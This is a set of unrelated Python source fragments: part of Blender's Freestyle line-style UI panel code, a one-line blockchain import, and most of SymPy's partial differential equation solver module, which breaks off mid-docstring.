col.prop(modifier, "amplitude")
col.prop(modifier, "seed")
col = split.column()
col.prop(modifier, "octaves")
col.prop(modifier, "angle")
elif modifier.type == 'BACKBONE_STRETCHER':
box.prop(modifier, "backbone_length")
elif modifier.type == 'TIP_REMOVER':
box.prop(modifier, "tip_length")
elif modifier.type == 'POLYGONIZATION':
box.prop(modifier, "error")
elif modifier.type == 'GUIDING_LINES':
box.prop(modifier, "offset")
elif modifier.type == 'BLUEPRINT':
row = box.row()
row.prop(modifier, "shape", expand=True)
box.prop(modifier, "rounds")
row = box.row()
if modifier.shape in {'CIRCLES', 'ELLIPSES'}:
row.prop(modifier, "random_radius")
row.prop(modifier, "random_center")
elif modifier.shape == 'SQUARES':
row.prop(modifier, "backbone_length")
row.prop(modifier, "random_backbone")
elif modifier.type == '2D_OFFSET':
row = box.row(align=True)
row.prop(modifier, "start")
row.prop(modifier, "end")
row = box.row(align=True)
row.prop(modifier, "x")
row.prop(modifier, "y")
elif modifier.type == '2D_TRANSFORM':
box.prop(modifier, "pivot")
if modifier.pivot == 'PARAM':
box.prop(modifier, "pivot_u")
elif modifier.pivot == 'ABSOLUTE':
row = box.row(align=True)
row.prop(modifier, "pivot_x")
row.prop(modifier, "pivot_y")
row = box.row(align=True)
row.prop(modifier, "scale_x")
row.prop(modifier, "scale_y")
box.prop(modifier, "angle")
elif modifier.type == 'SIMPLIFICATION':
box.prop(modifier, "tolerance")
def draw(self, context):
layout = self.layout
view_layer = context.view_layer
lineset = view_layer.freestyle_settings.linesets.active
layout.active = view_layer.use_freestyle
if lineset is None:
return
linestyle = lineset.linestyle
layout.template_ID(lineset, "linestyle", new="scene.freestyle_linestyle_new")
if linestyle is None:
return
row = layout.row(align=True)
row.prop(linestyle, "panel", expand=True)
if linestyle.panel == 'STROKES':
# Chaining
layout.prop(linestyle, "use_chaining", text="Chaining:")
split = layout.split(align=True)
split.active = linestyle.use_chaining
# First column
col = split.column()
col.active = linestyle.use_chaining
col.prop(linestyle, "chaining", text="")
if linestyle.chaining == 'SKETCHY':
col.prop(linestyle, "rounds")
# Second column
col = split.column()
col.prop(linestyle, "use_same_object")
# Splitting
layout.label(text="Splitting:")
split = layout.split(align=True)
# First column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_angle_min", text="")
sub = row.row()
sub.active = linestyle.use_angle_min
sub.prop(linestyle, "angle_min")
row = col.row(align=True)
row.prop(linestyle, "use_angle_max", text="")
sub = row.row()
sub.active = linestyle.use_angle_max
sub.prop(linestyle, "angle_max")
# Second column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_split_length", text="")
sub = row.row()
sub.active = linestyle.use_split_length
sub.prop(linestyle, "split_length", text="2D Length")
row = col.row(align=True)
row.prop(linestyle, "material_boundary")
# End of columns
row = layout.row(align=True)
row.prop(linestyle, "use_split_pattern", text="")
sub = row.row(align=True)
sub.active = linestyle.use_split_pattern
sub.prop(linestyle, "split_dash1", text="D1")
sub.prop(linestyle, "split_gap1", text="G1")
sub.prop(linestyle, "split_dash2", text="D2")
sub.prop(linestyle, "split_gap2", text="G2")
sub.prop(linestyle, "split_dash3", text="D3")
sub.prop(linestyle, "split_gap3", text="G3")
# Sorting
layout.prop(linestyle, "use_sorting", text="Sorting:")
col = layout.column()
col.active = linestyle.use_sorting
row = col.row(align=True)
row.prop(linestyle, "sort_key", text="")
sub = row.row()
sub.active = linestyle.sort_key in {'DISTANCE_FROM_CAMERA',
'PROJECTED_X',
'PROJECTED_Y'}
sub.prop(linestyle, "integration_type", text="")
row = col.row(align=True)
row.prop(linestyle, "sort_order", expand=True)
# Selection
layout.label(text="Selection:")
split = layout.split(align=True)
# First column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_length_min", text="")
sub = row.row()
sub.active = linestyle.use_length_min
sub.prop(linestyle, "length_min")
row = col.row(align=True)
row.prop(linestyle, "use_length_max", text="")
sub = row.row()
sub.active = linestyle.use_length_max
sub.prop(linestyle, "length_max")
# Second column
col = split.column()
row = col.row(align=True)
row.prop(linestyle, "use_chain_count", text="")
sub = row.row()
sub.active = linestyle.use_chain_count
sub.prop(linestyle, "chain_count")
# Caps
layout.label(text="Caps:")
row = layout.row(align=True)
row.prop(linestyle, "caps", expand=True)
# Dashed lines
layout.prop(linestyle, "use_dashed_line", text="Dashed Line:")
row = layout.row(align=True)
row.active = linestyle.use_dashed_line
row.prop(linestyle, "dash1", text="D1")
row.prop(linestyle, "gap1", text="G1")
row.prop(linestyle, "dash2", text="D2")
row.prop(linestyle, "gap2", text="G2")
row.prop(linestyle, "dash3", text="D3")
row.prop(linestyle, "gap3", text="G3")
elif linestyle.panel == 'COLOR':
col = layout.column()
row = col.row()
row.label(text="Base Color:")
row.prop(linestyle, "color", text="")
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_color_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.color_modifiers:
self.draw_color_modifier(context, modifier)
elif linestyle.panel == 'ALPHA':
col = layout.column()
row = col.row()
row.label(text="Base Transparency:")
row.prop(linestyle, "alpha")
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_alpha_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.alpha_modifiers:
self.draw_alpha_modifier(context, modifier)
elif linestyle.panel == 'THICKNESS':
col = layout.column()
row = col.row()
row.label(text="Base Thickness:")
row.prop(linestyle, "thickness")
subcol = col.column()
subcol.active = linestyle.chaining == 'PLAIN' and linestyle.use_same_object
row = subcol.row()
row.prop(linestyle, "thickness_position", expand=True)
row = subcol.row()
row.prop(linestyle, "thickness_ratio")
row.active = (linestyle.thickness_position == 'RELATIVE')
col = layout.column()
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_thickness_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.thickness_modifiers:
self.draw_thickness_modifier(context, modifier)
elif linestyle.panel == 'GEOMETRY':
col = layout.column()
col.label(text="Modifiers:")
col.operator_menu_enum("scene.freestyle_geometry_modifier_add", "type", text="Add Modifier")
for modifier in linestyle.geometry_modifiers:
self.draw_geometry_modifier(context, modifier)
elif linestyle.panel == 'TEXTURE':
layout.separator()
row = layout.row()
row.prop(linestyle, "use_nodes")
row.prop(linestyle, "texture_spacing", text="Spacing Along Stroke")
row = layout.row()
props = row.operator(
"wm.properties_context_change",
text="Go to Linestyle Textures Properties",
icon='TEXTURE',
)
props.context = 'TEXTURE'
elif linestyle.panel == 'MISC':
pass
# Material properties
class MaterialFreestyleButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "material"
# COMPAT_ENGINES must be defined in each subclass, external engines can add themselves here
@classmethod
def poll(cls, context):
scene = context.scene
material = context.material
with_freestyle = bpy.app.build_options.freestyle
return (
with_freestyle and material and scene and scene.render.use_freestyle and
(context.engine in cls.COMPAT_ENGINES)
)
class MATERIAL_PT_freestyle_line(MaterialFreestyleButtonsPanel, Panel):
bl_label = "Freestyle Line"
bl_options = {'DEFAULT_CLOSED'}
COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_EEVEE'}
def draw(self, context):
layout = self.layout
mat = context.material
row = layout.row()
row.prop(mat, "line_color", text="")
row.prop(mat, "line_priority", text="Priority")
classes = (
RENDER_PT_freestyle,
VIEWLAYER_UL_linesets,
RENDER_MT_lineset_context_menu,
VIEWLAYER_PT_freestyle,
VIEWLAYER_PT_freestyle_lineset,
VIEWLAYER_PT_freestyle_linestyle,
MATERIAL_PT_freestyle_line,
)
if __name__ == "__main__": # only for live edit.
from bpy.utils import register_class
for cls in classes:
register_class(cls)
|
from .base import Block, GenesisBlock, BlockChain
|
"""
This module contains pdsolve() and different helper functions that it
uses. It is heavily inspired by the ode module and hence the basic
infrastructure remains the same.
**Functions in this module**
These are the user functions in this module:
- pdsolve() - Solves PDE's
- classify_pde() - Classifies PDEs into possible hints for dsolve().
- pde_separate() - Separate variables in partial differential equation either by
additive or multiplicative separation approach.
These are the helper functions in this module:
- pde_separate_add() - Helper function for searching additive separable solutions.
- pde_separate_mul() - Helper function for searching multiplicative
separable solutions.
**Currently implemented solver methods**
The following methods are implemented for solving partial differential
equations. See the docstrings of the various pde_hint() functions for
more information on each (run help(pde)):
- 1st order linear homogeneous partial differential equations
with constant coefficients.
- 1st order linear general partial differential equations
with constant coefficients.
- 1st order linear partial differential equations with
variable coefficients.
"""
from itertools import combinations_with_replacement
from sympy.simplify import simplify # type: ignore
from sympy.core import Add, S
from sympy.core.compatibility import reduce, is_sequence
from sympy.core.function import Function, expand, AppliedUndef, Subs
from sympy.core.relational import Equality, Eq
from sympy.core.symbol import Symbol, Wild, symbols
from sympy.functions import exp
from sympy.integrals.integrals import Integral
from sympy.utilities.iterables import has_dups
from sympy.utilities.misc import filldedent
from sympy.solvers.deutils import _preprocess, ode_order, _desolve
from sympy.solvers.solvers import solve
from sympy.simplify.radsimp import collect
import operator
allhints = (
"1st_linear_constant_coeff_homogeneous",
"1st_linear_constant_coeff",
"1st_linear_constant_coeff_Integral",
"1st_linear_variable_coeff"
)
def pdsolve(eq, func=None, hint='default', dict=False, solvefun=None, **kwargs):
"""
Solves any (supported) kind of partial differential equation.
**Usage**
pdsolve(eq, f(x,y), hint) -> Solve partial differential equation
eq for function f(x,y), using method hint.
**Details**
``eq`` can be any supported partial differential equation (see
the pde docstring for supported methods). This can either
be an Equality, or an expression, which is assumed to be
equal to 0.
``f(x,y)`` is a function of two variables whose derivatives in that
variable make up the partial differential equation. In many
cases it is not necessary to provide this; it will be autodetected
(and an error raised if it couldn't be detected).
``hint`` is the solving method that you want pdsolve to use. Use
classify_pde(eq, f(x,y)) to get all of the possible hints for
a PDE. The default hint, 'default', will use whatever hint
is returned first by classify_pde(). See Hints below for
more options that you can use for hint.
``solvefun`` is the convention used for arbitrary functions returned
by the PDE solver. If not set by the user, it is set by default
to be F.
**Hints**
Aside from the various solving methods, there are also some
meta-hints that you can pass to pdsolve():
"default":
This uses whatever hint is returned first by
classify_pde(). This is the default argument to
pdsolve().
"all":
To make pdsolve apply all relevant classification hints,
use pdsolve(PDE, func, hint="all"). This will return a
dictionary of hint:solution terms. If a hint causes
pdsolve to raise the NotImplementedError, value of that
hint's key will be the exception object raised. The
dictionary will also include some special keys:
- order: The order of the PDE. See also ode_order() in
deutils.py
- default: The solution that would be returned by
default. This is the one produced by the hint that
appears first in the tuple returned by classify_pde().
"all_Integral":
This is the same as "all", except if a hint also has a
corresponding "_Integral" hint, it only returns the
"_Integral" hint. This is useful if "all" causes
pdsolve() to hang because of a difficult or impossible
integral. This meta-hint will also be much faster than
"all", because integrate() is an expensive routine.
See also the classify_pde() docstring for more info on hints,
and the pde docstring for a list of all supported hints.
**Tips**
- You can declare the derivative of an unknown function this way:
>>> from sympy import Function, Derivative
>>> from sympy.abc import x, y # x and y are the independent variables
>>> f = Function("f")(x, y) # f is a function of x and y
>>> # fx will be the partial derivative of f with respect to x
>>> fx = Derivative(f, x)
>>> # fy will be the partial derivative of f with respect to y
>>> fy = Derivative(f, y)
- See test_pde.py for many tests, which serves also as a set of
examples for how to use pdsolve().
- pdsolve always returns an Equality class (except for the case
when the hint is "all" or "all_Integral"). Note that it is not possible
to get an explicit solution for f(x, y) as in the case of ODE's
- Do help(pde.pde_hintname) to get help more information on a
specific hint
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)
>>> pdsolve(eq)
Eq(f(x, y), F(3*x - 2*y)*exp(-2*x/13 - 3*y/13))
"""
if not solvefun:
solvefun = Function('F')
# See the docstring of _desolve for more details.
hints = _desolve(eq, func=func, hint=hint, simplify=True,
type='pde', **kwargs)
eq = hints.pop('eq', False)
all_ = hints.pop('all', False)
if all_:
# TODO : 'best' hint should be implemented when adequate
# number of hints are added.
pdedict = {}
failed_hints = {}
gethints = classify_pde(eq, dict=True)
pdedict.update({'order': gethints['order'],
'default': gethints['default']})
for hint in hints:
try:
rv = _helper_simplify(eq, hint, hints[hint]['func'],
hints[hint]['order'], hints[hint][hint], solvefun)
except NotImplementedError as detail:
failed_hints[hint] = detail
else:
pdedict[hint] = rv
pdedict.update(failed_hints)
return pdedict
else:
return _helper_simplify(eq, hints['hint'], hints['func'],
hints['order'], hints[hints['hint']], solvefun)
def _helper_simplify(eq, hint, func, order, match, solvefun):
"""Helper function of pdsolve that calls the respective
pde functions to solve for the partial differential
equations. This minimizes the computation in
calling _desolve multiple times.
"""
if hint.endswith("_Integral"):
solvefunc = globals()[
"pde_" + hint[:-len("_Integral")]]
else:
solvefunc = globals()["pde_" + hint]
return _handle_Integral(solvefunc(eq, func, order,
match, solvefun), func, order, hint)
def _handle_Integral(expr, func, order, hint):
r"""
Converts a solution with integrals in it into an actual solution.
Simplifies the integral mainly using doit()
"""
if hint.endswith("_Integral"):
return expr
elif hint == "1st_linear_constant_coeff":
return simplify(expr.doit())
else:
return expr
def classify_pde(eq, func=None, dict=False, *, prep=True, **kwargs):
"""
Returns a tuple of possible pdsolve() classifications for a PDE.
The tuple is ordered so that first item is the classification that
pdsolve() uses to solve the PDE by default. In general,
classifications near the beginning of the list will produce
better solutions faster than those near the end, though there are
always exceptions. To make pdsolve use a different classification,
use pdsolve(PDE, func, hint=<classification>). See also the pdsolve()
docstring for different meta-hints you can use.
If ``dict`` is true, classify_pde() will return a dictionary of
hint:match expression terms. This is intended for internal use by
pdsolve(). Note that because dictionaries are ordered arbitrarily,
this will most likely not be in the same order as the tuple.
You can get help on different hints by doing help(pde.pde_hintname),
where hintname is the name of the hint without "_Integral".
See sympy.pde.allhints or the sympy.pde docstring for a list of all
supported hints that can be returned from classify_pde.
Examples
========
>>> from sympy.solvers.pde import classify_pde
>>> from sympy import Function, Eq
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> u = f(x, y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> eq = Eq(1 + (2*(ux/u)) + (3*(uy/u)), 0)
>>> classify_pde(eq)
('1st_linear_constant_coeff_homogeneous',)
"""
if func and len(func.args) != 2:
raise NotImplementedError("Right now only partial "
"differential equations of two variables are supported")
if prep or func is None:
prep, func_ = _preprocess(eq, func)
if func is None:
func = func_
if isinstance(eq, Equality):
if eq.rhs != 0:
return classify_pde(eq.lhs - eq.rhs, func)
eq = eq.lhs
f = func.func
x = func.args[0]
y = func.args[1]
fx = f(x,y).diff(x)
fy = f(x,y).diff(y)
# TODO : For now pde.py uses support offered by the ode_order function
# to find the order with respect to a multi-variable function. An
# improvement could be to classify the order of the PDE on the basis of
# individual variables.
order = ode_order(eq, f(x,y))
# hint:matchdict or hint:(tuple of matchdicts)
# Also will contain "default":<default hint> and "order":order items.
matching_hints = {'order': order}
if not order:
if dict:
matching_hints["default"] = None
return matching_hints
else:
return ()
eq = expand(eq)
a = Wild('a', exclude = [f(x,y)])
b = Wild('b', exclude = [f(x,y), fx, fy, x, y])
c = Wild('c', exclude = [f(x,y), fx, fy, x, y])
d = Wild('d', exclude = [f(x,y), fx, fy, x, y])
e = Wild('e', exclude = [f(x,y), fx, fy])
n = Wild('n', exclude = [x, y])
# Try removing the smallest power of f(x,y)
# from the highest partial derivatives of f(x,y)
reduced_eq = None
if eq.is_Add:
var = set(combinations_with_replacement((x,y), order))
dummyvar = var.copy()
power = None
for i in var:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a]:
power = match[n]
dummyvar.remove(i)
break
dummyvar.remove(i)
for i in dummyvar:
coeff = eq.coeff(f(x,y).diff(*i))
if coeff != 1:
match = coeff.match(a*f(x,y)**n)
if match and match[a] and match[n] < power:
power = match[n]
if power:
den = f(x,y)**power
reduced_eq = Add(*[arg/den for arg in eq.args])
if not reduced_eq:
reduced_eq = eq
if order == 1:
reduced_eq = collect(reduced_eq, f(x, y))
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
if not r[e]:
## Linear first-order homogeneous partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d})
matching_hints["1st_linear_constant_coeff_homogeneous"] = r
else:
if r[b]**2 + r[c]**2 != 0:
## Linear first-order general partial-differential
## equation with constant coefficients
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_constant_coeff"] = r
matching_hints[
"1st_linear_constant_coeff_Integral"] = r
else:
b = Wild('b', exclude=[f(x, y), fx, fy])
c = Wild('c', exclude=[f(x, y), fx, fy])
d = Wild('d', exclude=[f(x, y), fx, fy])
r = reduced_eq.match(b*fx + c*fy + d*f(x,y) + e)
if r:
r.update({'b': b, 'c': c, 'd': d, 'e': e})
matching_hints["1st_linear_variable_coeff"] = r
# Order keys based on allhints.
retlist = []
for i in allhints:
if i in matching_hints:
retlist.append(i)
if dict:
# Dictionaries are ordered arbitrarily, so make note of which
# hint would come first for pdsolve(). Use an ordered dict in Py 3.
matching_hints["default"] = None
matching_hints["ordered_hints"] = tuple(retlist)
for i in allhints:
if i in matching_hints:
matching_hints["default"] = i
break
return matching_hints
else:
return tuple(retlist)
def checkpdesol(pde, sol, func=None, solve_for_func=True):
"""
Checks if the given solution satisfies the partial differential
equation.
pde is the partial differential equation which can be given in the
form of an equation or an expression. sol is the solution for which
the pde is to be checked. This can also be given in an equation or
an expression form. If the function is not provided, the helper
function _preprocess from deutils is used to identify the function.
If a sequence of solutions is passed, the same sort of container will be
used to return the result for each solution.
The following methods are currently being implemented to check if the
solution satisfies the PDE:
1. Directly substitute the solution in the PDE and check. If the
solution hasn't been solved for f, then it will solve for f
provided solve_for_func hasn't been set to False.
If the solution satisfies the PDE, then a tuple (True, 0) is returned.
Otherwise a tuple (False, expr) where expr is the value obtained
after substituting the solution in the PDE. However if a known solution
returns False, it may be due to the inability of doit() to simplify it to zero.
Examples
========
>>> from sympy import Function, symbols
>>> from sympy.solvers.pde import checkpdesol, pdsolve
>>> x, y = symbols('x y')
>>> f = Function('f')
>>> eq = 2*f(x,y) + 3*f(x,y).diff(x) + 4*f(x,y).diff(y)
>>> sol = pdsolve(eq)
>>> assert checkpdesol(eq, sol)[0]
>>> eq = x*f(x,y) + f(x,y).diff(x)
>>> checkpdesol(eq, sol)
(False, (x*F(4*x - 3*y) - 6*F(4*x - 3*y)/25 + 4*Subs(Derivative(F(_xi_1), _xi_1), _xi_1, 4*x - 3*y))*exp(-6*x/25 - 8*y/25))
"""
# Converting the pde into an equation
if not isinstance(pde, Equality):
pde = Eq(pde, 0)
# If no function is given, try finding the function present.
if func is None:
try:
_, func = _preprocess(pde.lhs)
except ValueError:
funcs = [s.atoms(AppliedUndef) for s in (
sol if is_sequence(sol, set) else [sol])]
funcs = set().union(funcs)
if len(funcs) != 1:
raise ValueError(
'must pass func arg to checkpdesol for this case.')
func = funcs.pop()
# If the given solution is in the form of a list or a set
# then return a list or set of tuples.
if is_sequence(sol, set):
return type(sol)([checkpdesol(
pde, i, func=func,
solve_for_func=solve_for_func) for i in sol])
# Convert solution into an equation
if not isinstance(sol, Equality):
sol = Eq(func, sol)
elif sol.rhs == func:
sol = sol.reversed
# Try solving for the function
solved = sol.lhs == func and not sol.rhs.has(func)
if solve_for_func and not solved:
solved = solve(sol, func)
if solved:
if len(solved) == 1:
return checkpdesol(pde, Eq(func, solved[0]),
func=func, solve_for_func=False)
else:
return checkpdesol(pde, [Eq(func, t) for t in solved],
func=func, solve_for_func=False)
# try direct substitution of the solution into the PDE and simplify
if sol.lhs == func:
pde = pde.lhs - pde.rhs
s = simplify(pde.subs(func, sol.rhs).doit())
return s is S.Zero, s
raise NotImplementedError(filldedent('''
Unable to test if %s is a solution to %s.''' % (sol, pde)))
def pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):
r"""
Solves a first order linear homogeneous
partial differential equation with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{\partial f(x,y)}{\partial x}
+ b \frac{\partial f(x,y)}{\partial y} + c f(x,y) = 0
where `a`, `b` and `c` are constants.
The general solution is of the form:
.. math::
f(x, y) = F(- a y + b x ) e^{- \frac{c (a x + b y)}{a^2 + b^2}}
and can be found in SymPy with ``pdsolve``::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*ux + b*uy + c*u
>>> pprint(genform)
d d
a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y)
dx dy
>>> pprint(pdsolve(genform))
-c*(a*x + b*y)
---------------
2 2
a + b
f(x, y) = F(-a*y + b*x)*e
Examples
========
>>> from sympy import pdsolve
>>> from sympy import Function, pprint
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))
Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
>>> pprint(pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)))
x y
- - - -
2 2
f(x, y) = F(x - y)*e
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
# TODO : For now homogeneous first order linear PDE's having
# two variables are implemented. Once there is support for
# solving systems of ODE's, this can be extended to n variables.
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
return Eq(f(x,y), exp(-S(d)/(b**2 + c**2)*(b*x + c*y))*solvefun(c*x - b*y))
def pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with constant coefficients.
The general form of this partial differential equation is
.. math:: a \frac{\partial f(x,y)}{\partial x}
+ b \frac{\partial f(x,y)}{\partial y}
+ c f(x,y) = G(x,y)
where `a`, `b` and `c` are constants and `G(x, y)` can be an arbitrary
function in `x` and `y`.
The general solution of the PDE is:
.. math::
f(x, y) = \left. \left[F(\eta) + \frac{1}{a^2 + b^2}
\int\limits^{a x + b y} G\left(\frac{a \xi + b \eta}{a^2 + b^2},
\frac{- a \eta + b \xi}{a^2 + b^2} \right)
e^{\frac{c \xi}{a^2 + b^2}}\, d\xi\right]
e^{- \frac{c \xi}{a^2 + b^2}}
\right|_{\substack{\eta=- a y + b x\\ \xi=a x + b y }}\, ,
where `F(\eta)` is an arbitrary single-valued function. The solution
can be found in SymPy with ``pdsolve``::
>>> from sympy.solvers import pdsolve
>>> from sympy.abc import x, y, a, b, c
>>> from sympy import Function, pprint
>>> f = Function('f')
>>> G = Function('G')
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a*ux + b*uy + c*u - G(x,y)
>>> pprint(genform)
d d
a*--(f(x, y)) + b*--(f(x, y)) + c*f(x, y) - G(x, y)
dx dy
>>> pprint(pdsolve(genform, hint='1st_linear_constant_coeff_Integral'))
// a*x + b*y \
|| / |
|| | |
|| | c*xi |
|| | ------- |
|| | 2 2 |
|| | /a*xi + b*eta -a*eta + b*xi\ a + b |
|| | G|------------, -------------|*e d(xi)|
|| | | 2 2 2 2 | |
|| | \ a + b a + b / |
|| | |
|| / |
|| |
f(x, y) = ||F(eta) + -------------------------------------------------------|*
|| 2 2 |
\\ a + b /
<BLANKLINE>
\|
||
||
||
||
||
||
||
||
-c*xi ||
-------||
2 2||
a + b ||
e ||
||
/|eta=-a*y + b*x, xi=a*x + b*y
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, pprint, exp
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)
>>> pdsolve(eq)
Eq(f(x, y), (F(4*x + 2*y) + exp(x/2 + 4*y)/15)*exp(x/2 - y))
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
# TODO : For now homogeneous first order linear PDE's having
# two variables are implemented. Once there is support for
# solving systems of ODE's, this can be extended to n variables.
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
expterm = exp(-S(d)/(b**2 + c**2)*xi)
functerm = solvefun(eta)
solvedict = solve((b*x + c*y - xi, c*x - b*y - eta), x, y)
# Integral should remain as it is in terms of xi,
# doit() should be done in _handle_Integral.
genterm = (1/S(b**2 + c**2))*Integral(
(1/expterm*e).subs(solvedict), (xi, b*x + c*y))
return Eq(f(x,y), Subs(expterm*(functerm + genterm),
(eta, xi), (c*x - b*y, b*x + c*y)))
def pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):
r"""
Solves a first order linear partial differential equation
with variable coefficients. The general form of this partial
differential equation is
.. math:: a(x, y) \frac{\partial f(x, y)}{\partial x}
+ b(x, y) \frac{\partial f(x, y)}{\partial y}
+ c(x, y) f(x, y) = G(x, y)
where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary
functions in `x` and `y`. This PDE is converted into an ODE by
making the following transformation:
1. `\xi` as `x`
2. `\eta` as the constant in the solution to the differential
equation `\frac{dy}{dx} = -\frac{b}{a}`
Making the previous substitutions reduces it to the linear ODE
.. math:: a(\xi, \eta)\frac{du}{d\xi} + c(\xi, \eta)u - G(\xi, \eta) = 0
which can be solved using ``dsolve``.
>>> from sympy.abc import x, y
>>> from sympy import Function, pprint
>>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]
>>> u = f(x,y)
>>> ux = u.diff(x)
>>> uy = u.diff(y)
>>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)
>>> pprint(genform)
d d
-G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))
dx dy
Examples
========
>>> from sympy.solvers.pde import pdsolve
>>> from sympy import Function, pprint
>>> from sympy.abc import x,y
>>> f = Function('f')
>>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
>>> pdsolve(eq)
Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)
References
==========
- Viktor Grigoryan, "Partial Differential Equations"
Math 124A - Fall 2010, pp.7
"""
from sympy.integrals.integrals import integrate
from sympy.solvers.ode import dsolve
xi, eta = symbols("xi eta")
f = func.func
x = func.args[0]
y = func.args[1]
b = match[match['b']]
c = match[match['c']]
d = match[match['d']]
e = -match[match['e']]
if not d:
# To deal with cases like b*ux = e or c*uy = e
if not (b and c):
if c:
try:
tsol = integrate(e/c, y)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(x) + tsol)
if b:
try:
tsol = integrate(e/b, x)
except NotImplementedError:
raise NotImplementedError("Unable to find a solution"
" due to inability of integrate")
else:
return Eq(f(x,y), solvefun(y) + tsol)
if not c:
# To deal with cases when c is 0, a simpler method is used.
# The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x
plode = f(x).diff(x)*b + d*f(x) - e
sol = dsolve(plode, f(x))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)
return Eq(f(x, y), rhs)
if not b:
# To deal with cases when b is 0, a simpler method is used.
# The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y
plode = f(y).diff(y)*c + d*f(y) - e
sol = dsolve(plode, f(y))
syms = sol.free_symbols - plode.free_symbols - {x, y}
rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)
return Eq(f(x, y), rhs)
dummy = Function('d')
h = (c/b).subs(y, dummy(x))
sol = dsolve(dummy(x).diff(x) - h, dummy(x))
if isinstance(sol, list):
sol = sol[0]
solsym = sol.free_symbols - h.free_symbols - {x, y}
if len(solsym) == 1:
solsym = solsym.pop()
etat = (solve(sol, solsym)[0]).subs(dummy(x), y)
ysub = solve(eta - etat, y)[0]
deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)
final = (dsolve(deq, f(x), hint='1st_linear')).rhs
if isinstance(final, list):
final = final[0]
finsyms = final.free_symbols - deq.free_symbols - {x, y}
rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)
return Eq(f(x, y), rhs)
else:
raise NotImplementedError("Cannot solve the partial differential equation due"
" to inability of constantsimp")
def _simplify_variable_coeff(sol, syms, func, funcarg):
r"""
Helper function to replace constants by functions in 1st_linear_variable_coeff
"""
eta = Symbol("eta")
if len(syms) == 1:
sym = syms.pop()
final = sol.subs(sym, func(funcarg))
else:
for key, sym in enumerate(syms):
final = sol.subs(sym, func(funcarg))
return simplify(final.subs(eta, funcarg))
def pde_separate(eq, fun, sep, strategy='mul'):
"""Separate variables in partial differential equation either by additive
or multiplicative separation approach. It tries to rewrite an equation so
that one of the specified variables occurs on a different side of the
equation than the others.
:param eq: Partial differential equation
:param fun: Original function F(x, y, z)
:param sep: List of separated functions [X(x), u(y, z)]
:param strategy: Separation strategy. You can choose between additive
separation ('add') and multiplicative separation ('mul') which is
default.
Examples
========
>>> from sympy import E, Eq, Function, pde_separate, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
>>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')
